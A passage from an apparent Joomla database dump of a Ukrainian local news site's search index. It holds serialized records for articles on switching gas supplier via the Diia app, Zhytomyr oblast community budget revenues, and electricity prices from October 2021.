компанії ГК «Нафтогаз України» копій обраного цифрового документу, натиснувши кнопку «Надіслати через Дію». Після підтвердження на екраніз’явиться ваша заявка на приєднання до газопостачання від ГК «Нафтогаз України» із частково заповненими даними, які будуть підвантажені з додатку Дія;','2021-07-14 16:43:18','ed8b073494a2a0eb9d58a73fef13dee1',1,1,1,'*','2021-07-14 09:05:38','0000-00-00 00:00:00','2021-07-14 09:05:38','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2528\";s:5:\"alias\";s:51:\"zminiti-postachalnika-gazu-teper-mozhna-cherez-diyu\";s:7:\"summary\";s:2571:\"<!--StartFragment--><p style=\"text-align: left;\"><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/dia.jpg\"><img alt=\"\" class=\"fr-fil fr-dii\" src=\"https://malehus.in.ua/images/stories/dia.jpg\" width=\"251\"></a><br></p><p>Приєднатися до державного постачальника газу – ГК «Нафтогаз України» – тепер можна через застосунок «Дія». Таким чином, вибір оптимального тарифного пакету для купівлі газу і оформлення заявки на приєднання займе всього кілька хвилин.</p><p>Як швидко та зручно стати клієнтом Газопостачальної компанії «Нафтогаз України» через «Дію»? Покрокова інструкція.</p><p>1. Перейдіть на офіційний сайт ГК «Нафтогаз України»&nbsp;gas.ua&nbsp;у розділ «Стати нашим клієнтом»;<br>2. Оберіть варіант подачі заявки «Сайт» та натисніть «Подати заявку»;<br>3. Серед запропонованих способів заповнення заявки оберіть Дію;<br>Система запропонує вам обрати один із двох документів — ID-картку або РНОКПП (раніше — ІПН, індивідуальний податковий номер). Оберіть саме той документ, який додано та верифіковано у вашому застосунку Дія, та відскануйте запропонований QR-код (якщо ж ви заповнюєте заявку у мобільній версії сайту, просто натисніть на QR-код на екрані);<br>4. Далі на вашому смартфоні потрібно підтвердити передачу компанії ГК «Нафтогаз України» копій обраного цифрового документу, натиснувши кнопку «Надіслати через Дію». Після підтвердження на екрані з’явиться ваша заявка на приєднання до газопостачання від ГК «Нафтогаз України» із частково заповненими даними, які будуть підвантажені з додатку Дія;\";s:4:\"body\";s:852:\"<br>5. Доповніть деякі поля необхідною інформацією для зміни постачальника. Щоб завершити процес, натисніть «Сформувати файл заявки» та підпишіть її зручним для вас способом — електронним підписом (КЕП) або від руки.<br>Отже, подача заявки на сайті компанії gas.ua відбувається у кілька кліків, а її обробка триває 10-15 хвилин ― без урахування актуалізації даних на платформі Оператора ГТС, що триває в середньому три дні.</p><p><a href=\"https://gazpravda.com.ua/\">https://gazpravda.com.ua/</a></p><!--EndFragment-->\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-07-14 13:43:18\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"3\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:56:\"2528:zminiti-postachalnika-gazu-teper-mozhna-cherez-diyu\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:68:\"/8-novini-2/2528-zminiti-postachalnika-gazu-teper-mozhna-cherez-diyu\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2528\";s:5:\"route\";s:109:\"index.php?option=com_content&view=article&id=2528:zminiti-postachalnika-gazu-teper-mozhna-cherez-diyu&catid=8\";s:5:\"title\";s:94:\"Змінити постачальника газу тепер можна через «Дію»\";s:11:\"description\";s:2307:\" Приєднатися до державного постачальника газу – ГК «Нафтогаз України» – тепер можна через застосунок «Дія». Таким чином, вибір оптимального тарифного пакету для купівлі газу і оформлення заявки на приєднання займе всього кілька хвилин. Як швидко та зручно стати клієнтом Газопостачальної компанії «Нафтогаз України» через «Дію»? Покрокова інструкція. 1. Перейдіть на офіційний сайт ГК «Нафтогаз України» gas.ua у розділ «Стати нашим клієнтом»; 2. Оберіть варіант подачі заявки «Сайт» та натисніть «Подати заявку»; 3. Серед запропонованих способів заповнення заявки оберіть Дію; Система запропонує вам обрати один із двох документів — ID-картку або РНОКПП (раніше — ІПН, індивідуальний податковий номер). Оберіть саме той документ, який додано та верифіковано у вашому застосунку Дія, та відскануйте запропонований QR-код (якщо ж ви заповнюєте заявку у мобільній версії сайту, просто натисніть на QR-код на екрані); 4. Далі на вашому смартфоні потрібно підтвердити передачу компанії ГК «Нафтогаз України» копій обраного цифрового документу, натиснувши кнопку «Надіслати через Дію». Після підтвердження на екраніз’явиться ваша заявка на приєднання до газопостачання від ГК «Нафтогаз України» із частково заповненими даними, які будуть підвантажені з додатку Дія;\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-07-14 09:05:38\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-07-14 09:05:38\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4928,'index.php?option=com_content&view=article&id=2529','index.php?option=com_content&view=article&id=2529:vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-pershe-pivrichchya-2021-roku&catid=8','Виконання дохідної частини бюджетів ОТГ Житомирської області за перше півріччя 2021 року',' За даними Департамента фінансів Житомирської ОДА ','2021-07-15 15:09:14','5ca16fe34c3f8183f12efc9a248b118d',1,1,1,'*','2021-07-15 12:09:14','0000-00-00 00:00:00','2021-07-15 12:09:14','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2529\";s:5:\"alias\";s:99:\"vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-pershe-pivrichchya-2021-roku\";s:7:\"summary\";s:267:\"<p>За даними Департамента фінансів Житомирської ОДА<a class=\"modal\" href=\"https://malehus.in.ua/images/stories/censor.jpg\"><img src=\"https://malehus.in.ua/images/stories/censor.jpg\" alt=\"\" class=\"fr-fir\" width=\"207\"></a></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-07-15 12:09:14\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:104:\"2529:vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-pershe-pivrichchya-2021-roku\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:116:\"/8-novini-2/2529-vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-pershe-pivrichchya-2021-roku\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2529\";s:5:\"route\";s:157:\"index.php?option=com_content&view=article&id=2529:vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-pershe-pivrichchya-2021-roku&catid=8\";s:5:\"title\";s:161:\"Виконання дохідної частини бюджетів ОТГ Житомирської області за перше півріччя 2021 року\";s:11:\"description\";s:93:\" За даними Департамента фінансів Житомирської ОДА \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-07-15 12:09:14\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-07-15 12:09:14\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4929,'index.php?option=com_content&view=article&id=2530','index.php?option=com_content&view=article&id=2530:vartist-elektroenergiji-z-1-zhovtnya-21-roku&catid=8','Вартість електроенергії з 1 жовтня 21 року',' ','2021-08-17 14:51:23','82d5d8e8cb76cf6f779be88a75578d47',1,1,1,'*','2021-08-17 11:51:23','0000-00-00 00:00:00','2021-08-17 11:51:23','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2530\";s:5:\"alias\";s:44:\"vartist-elektroenergiji-z-1-zhovtnya-21-roku\";s:7:\"summary\";s:163:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/El.jpg\"><img src=\"https://malehus.in.ua/images/stories/El.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-08-17 11:51:23\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:49:\"2530:vartist-elektroenergiji-z-1-zhovtnya-21-roku\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:61:\"/8-novini-2/2530-vartist-elektroenergiji-z-1-zhovtnya-21-roku\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2530\";s:5:\"route\";s:102:\"index.php?option=com_content&view=article&id=2530:vartist-elektroenergiji-z-1-zhovtnya-21-roku&catid=8\";s:5:\"title\";s:75:\"Вартість електроенергії з 1 жовтня 21 року\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-08-17 11:51:23\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-08-17 11:51:23\";s:8:\"end_date\";s:19:\"0000-00-00 